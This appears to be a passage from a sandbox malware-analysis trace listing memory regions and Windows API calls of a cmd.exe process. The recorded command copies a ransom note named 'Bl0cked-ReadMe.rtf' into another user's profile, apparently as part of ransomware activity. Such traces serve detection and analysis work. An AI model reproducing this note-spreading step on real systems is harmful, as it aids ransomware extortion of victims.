"NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31194 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31195 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31196 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31197 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 31198 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 
region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31199 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31200 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31201 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31202 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31203 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31214 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31215 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31216 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31217 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 31218 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 31219 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name 
= "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31220 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31221 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31222 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31223 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31224 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31225 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31226 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31227 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31228 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000460000" filename = "" Region: id = 31229 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31230 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31231 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31232 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31233 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31234 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31235 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 31236 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 31237 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 720 os_tid = 0x848 [0212.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afe1c | out: lpSystemTimeAsFileTime=0x2afe1c*(dwLowDateTime=0xb331a1a0, dwHighDateTime=0x1d440a9)) [0212.029] GetCurrentProcessId () returned 0x248 [0212.029] GetCurrentThreadId () returned 0x848 [0212.029] GetTickCount () returned 0x3b79b [0212.029] QueryPerformanceCounter (in: lpPerformanceCount=0x2afe14 | out: 
lpPerformanceCount=0x2afe14*=26881802174) returned 1 [0212.029] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.029] __set_app_type (_Type=0x1) [0212.029] __p__fmode () returned 0x76b331f4 [0212.029] __p__commode () returned 0x76b331fc [0212.030] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.030] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.030] GetCurrentThreadId () returned 0x848 [0212.030] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x848) returned 0x38 [0212.030] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.030] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.030] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.030] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.030] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afdac | out: phkResult=0x2afdac*=0x0) returned 0x2 [0212.030] VirtualQuery (in: lpAddress=0x2afde3, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.030] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afd7c, dwLength=0x1c | out: lpBuffer=0x2afd7c*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0212.030] GetConsoleOutputCP () returned 0x1b5 [0212.030] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.031] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.031] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.031] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.031] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.031] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.031] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.031] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.031] GetEnvironmentStringsW () returned 0x370188* [0212.032] FreeEnvironmentStringsW (penv=0x370188) returned 1 [0212.032] GetEnvironmentStringsW () returned 0x370188* [0212.032] FreeEnvironmentStringsW (penv=0x370188) returned 1 [0212.032] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed1c | out: phkResult=0x2aed1c*=0x40) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed24, 
lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0xb0, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x0, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegCloseKey (hKey=0x40) returned 0x0 [0212.032] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aed1c | out: phkResult=0x2aed1c*=0x40) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, 
lpData=0x2aed28*=0x40, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x1, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x0, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.032] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.033] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x4, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x4) returned 0x0 [0212.033] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aed24, lpData=0x2aed28, lpcbData=0x2aed20*=0x1000 | out: lpType=0x2aed24*=0x0, lpData=0x2aed28*=0x9, lpcbData=0x2aed20*=0x1000) returned 0x2 [0212.033] RegCloseKey (hKey=0x40) returned 0x0 [0212.033] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.033] srand (_Seed=0x5b8863ae) [0212.033] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" [0212.033] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf\"" [0212.033] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.033] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718e8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.033] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.033] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.033] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.033] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.034] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.034] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.034] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0212.034] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.034] GetEnvironmentStringsW () returned 0x3722d8* [0212.034] FreeEnvironmentStringsW (penv=0x3722d8) returned 1 [0212.034] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.034] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 
[0212.034] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0212.034] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0212.034] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0212.034] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0212.034] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0212.034] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0212.034] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afae8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.034] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afae8, lpFilePart=0x2afae4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afae4*="Desktop") returned 0x18 [0212.034] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.034] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af864 | out: lpFindFileData=0x2af864) returned 0x370018 [0212.035] FindClose (in: hFindFile=0x370018 | out: hFindFile=0x370018) returned 1 [0212.035] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0212.035] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0212.035] 
SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0212.035] GetEnvironmentStringsW () returned 0x372af8* [0212.035] FreeEnvironmentStringsW (penv=0x372af8) returned 1 [0212.035] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.036] GetConsoleOutputCP () returned 0x1b5 [0212.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.036] GetUserDefaultLCID () returned 0x409 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc28, cchData=128 | out: lpLCData="0") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2afc28, cchData=128 | out: lpLCData="0") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc28, cchData=128 | out: lpLCData="1") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0212.036] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: 
lpLCData="Sun") returned 4 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0212.037] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0212.037] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0212.038] GetConsoleTitleW (in: lpConsoleTitle=0x3608e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.038] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0212.038] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0212.039] _wcsicmp (_String1="type", _String2=")") returned 75 [0212.039] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0212.039] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0212.039] _wcsicmp (_String1="IF", _String2="type") returned -11 [0212.039] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0212.039] _wcsicmp (_String1="REM", _String2="type") returned -2 [0212.039] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.042] GetFileType (hFile=0x7) returned 0x2 [0212.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0212.042] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afb20 | out: lpMode=0x2afb20) returned 1 [0212.042] _dup (_FileHandle=1) returned 3 [0212.043] _close (_FileHandle=1) returned 0 [0212.043] _wcsicmp (_String1="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0212.043] CreateFileW 
(lpFileName="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\favori~1\\micros~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afaf0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0212.044] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0212.044] GetConsoleTitleW (in: lpConsoleTitle=0x2af920, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0212.044] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0212.044] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0212.044] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0212.044] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0212.045] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.045] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af484, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af484) returned 0x360e78 [0212.045] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0212.045] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0212.045] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0212.046] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae390, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0212.046] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] GetFileType (hFile=0x54) returned 
0x1 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae3e8 | out: lpFileSizeHigh=0x2ae3e8*=0x0) returned 0x1632 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.046] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.046] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] GetFileType (hFile=0x4c) returned 0x1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] GetFileType (hFile=0x4c) returned 0x1 [0212.046] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.046] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.047] GetFileType (hFile=0x4c) returned 0x1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.047] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.047] _get_osfhandle (_FileHandle=1) returned 0x4c 